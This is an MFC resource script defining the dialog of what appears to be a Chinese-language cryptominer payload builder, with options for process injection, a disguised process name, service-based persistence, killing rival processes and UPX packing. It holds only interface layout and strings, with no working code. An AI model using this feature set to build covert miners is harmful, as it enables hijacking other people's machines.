//Microsoft Developer Studio generated resource script.
//
#include "resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "afxres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS

/////////////////////////////////////////////////////////////////////////////
// Chinese (中国) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
#pragma code_page(936)
#endif //_WIN32

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE DISCARDABLE 
BEGIN
    "resource.h\0"
END

2 TEXTINCLUDE DISCARDABLE 
BEGIN
    "#include ""afxres.h""\r\n"
    "\0"
END

3 TEXTINCLUDE DISCARDABLE 
BEGIN
    "#define _AFX_NO_SPLITTER_RESOURCES\r\n"
    "#define _AFX_NO_OLE_RESOURCES\r\n"
    "#define _AFX_NO_TRACKER_RESOURCES\r\n"
    "#define _AFX_NO_PROPERTY_RESOURCES\r\n"
    "\r\n"
    "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)\r\n"
    "#ifdef _WIN32\r\n"
    "LANGUAGE 4, 2\r\n"
    "#pragma code_page(936)\r\n"
    "#endif //_WIN32\r\n"
    "#include ""res\\生成器.rc2""  // non-Microsoft Visual C++ edited resources\r\n"
    "#include ""l.chs\\afxres.rc""          // Standard components\r\n"
    "#endif\r\n"
    "\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Icon
//

// Icon with lowest ID value placed first to ensure application icon
// remains consistent on all systems.
IDR_MAINFRAME           ICON    DISCARDABLE     "res\\生成器.ico"

/////////////////////////////////////////////////////////////////////////////
//
// Dialog
//

IDD_MY_DIALOG DIALOGEX 0, 0, 777, 254
STYLE DS_MODALFRAME | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU
EXSTYLE WS_EX_APPWINDOW
CAPTION "小学生挖矿程序qq：1509477745"
FONT 9, "宋体"
BEGIN
    PUSHBUTTON      "生成linux（64）",IDOK,80,140,71,25
    PUSHBUTTON      "取消",IDCANCEL,498,112,51,25
    LTEXT           "指令:",IDC_STATIC,14,47,51,10
    EDITTEXT        IDC_SET_DIS,68,46,288,13,ES_AUTOHSCROLL
    GROUPBOX        "活动公告",IDC_STATIC,7,186,649,56
    EDITTEXT        IDC_EDIT2,14,196,637,39,ES_AUTOHSCROLL
    LTEXT           "欢迎大家来我博客玩",IDC_STATIC,72,28,262,10
    PUSHBUTTON      "更新生成器",IDC_BUTTON1,13,151,50,14,WS_DISABLED
    PUSHBUTTON      "更新程序",IDC_xxs,15,14,50,14,WS_DISABLED
    LTEXT           "当前生成器版本：",IDC_STATIC,397,16,65,8
    LTEXT           "最新生成器版本：",IDC_STATIC,398,36,68,12
    LTEXT           "云端更新日期：",IDC_STATIC,398,57,76,11
    EDITTEXT        IDC_EDIT3,483,16,39,12,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT4,483,35,38,12,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT5,483,54,57,16,ES_AUTOHSCROLL
    PUSHBUTTON      "生成win",IDOK2,163,140,61,25
    PUSHBUTTON      "生成arm",IDOK3,240,140,57,25,WS_DISABLED
    LTEXT           "进程名:",IDC_STATIC,13,69,51,10
    EDITTEXT        IDC_SET_DIS2,68,67,288,13,ES_AUTOHSCROLL
    LTEXT           "win自动加上.exe",IDC_STATIC,361,65,38,20
    PUSHBUTTON      "开启离线模式",IDC_BUTTON2,418,81,56,27
    PUSHBUTTON      "关闭离线模式",IDC_BUTTON3,418,111,56,27
    CONTROL         "upx压缩",IDC_UPX,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,
                    68,83,44,10
    LTEXT           "linux最好不要压缩，可能段错误（不知道为啥）.",
                    IDC_STATIC,123,85,188,8
    GROUPBOX        "win附加选项",IDC_STATICwin,583,1,191,83
    GROUPBOX        "linux附加选项",IDC_STATIClinux,583,136,191,52
    EDITTEXT        IDC_EDIT6,645,15,39,12,ES_AUTOHSCROLL
    LTEXT           "注入进程:",IDC_STATIC,585,14,37,8
    LTEXT           "k服务:",IDC_STATIC,585,31,25,8
    EDITTEXT        IDC_EDIT7,645,32,57,12,ES_AUTOHSCROLL
    LTEXT           "k注册表:",IDC_STATIC,585,47,33,8
    EDITTEXT        IDC_EDIT8,645,47,57,12,ES_AUTOHSCROLL
    LTEXT           "k进程:",IDC_STATIC,585,63,25,8
    EDITTEXT        IDC_EDIT9,645,63,57,12,ES_AUTOHSCROLL
    LTEXT           "k进程:",IDC_STATIC,585,147,25,8
    EDITTEXT        IDC_EDIT10,645,146,57,12,ES_AUTOHSCROLL
    LTEXT           "0为关闭，内容用:隔开",IDC_STATIC,711,25,48,20
    LTEXT           "0为关闭，内容用:隔开",IDC_STATIC,708,144,51,21
    PUSHBUTTON      "版本介绍",IDC_HELP,13,131,50,14
    PUSHBUTTON      "附加选项",IDCANCEL2,498,82,51,25
    GROUPBOX        "启动设置",IDC_STATIClinux2,68,93,332,46
    LTEXT           "服务名称:",IDC_STATIC,69,105,51,10
    LTEXT           "服务显示:",IDC_STATIC,69,121,51,10
    LTEXT           "服务描述:",IDC_STATIC,205,103,51,10
    EDITTEXT        IDC_EDIT_SVCNAME,121,98,78,16,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT_SHELP,261,98,132,16,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT_SCNAME,121,117,207,16,ES_AUTOHSCROLL
    LTEXT           "这些功能暂时无法使用",IDC_STATIC,711,58,57,20
END


#ifndef _MAC
/////////////////////////////////////////////////////////////////////////////
//
// Version
//

VS_VERSION_INFO VERSIONINFO
 FILEVERSION 1,0,0,1
 PRODUCTVERSION 1,0,0,1
 FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
 FILEFLAGS 0x29L
#else
 FILEFLAGS 0x28L
#endif
 FILEOS 0x4L
 FILETYPE 0x1L
 FILESUBTYPE 0x0L
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "080404b0"
        BEGIN
            VALUE "Comments", "千鸟阁论坛qq:1509477745\0"
            VALUE "CompanyName", "千鸟阁论坛qq:1509477745\0"
            VALUE "FileDescription", "千鸟阁论坛qq:1509477745\0"
            VALUE "FileVersion", "千鸟阁论坛qq:1509477745\0"
            VALUE "InternalName", "千鸟阁论坛qq:1509477745\0"
            VALUE "LegalCopyright", "千鸟阁论坛qq:1509477745\0"
            VALUE "LegalTrademarks", "千鸟阁论坛qq:1509477745\0"
            VALUE "OriginalFilename", "千鸟阁论坛qq:1509477745\0"
            VALUE "PrivateBuild", "千鸟阁论坛qq:1509477745\0"
            VALUE "ProductName", "千鸟阁论坛qq:1509477745\0"
            VALUE "ProductVersion", "千鸟阁论坛qq:1509477745\0"
            VALUE "SpecialBuild", "千鸟阁论坛qq:1509477745\0"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x804, 1200
    END
END

#endif    // !_MAC


/////////////////////////////////////////////////////////////////////////////
//
// 24
//

1                       24      DISCARDABLE     "res\\default1.bin"

/////////////////////////////////////////////////////////////////////////////
//
// DESIGNINFO
//

#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO DISCARDABLE 
BEGIN
    IDD_MY_DIALOG, DIALOG
    BEGIN
        VERTGUIDE, 497
        HORZGUIDE, 62
        HORZGUIDE, 114
        HORZGUIDE, 131
    END
END
#endif    // APSTUDIO_INVOKED

#endif    // Chinese (中国) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
#define _AFX_NO_SPLITTER_RESOURCES
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
LANGUAGE 4, 2
#pragma code_page(936)
#endif //_WIN32
#include "res\生成器.rc2"  // non-Microsoft Visual C++ edited resources
#include "l.chs\afxres.rc"          // Standard components
#endif

/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

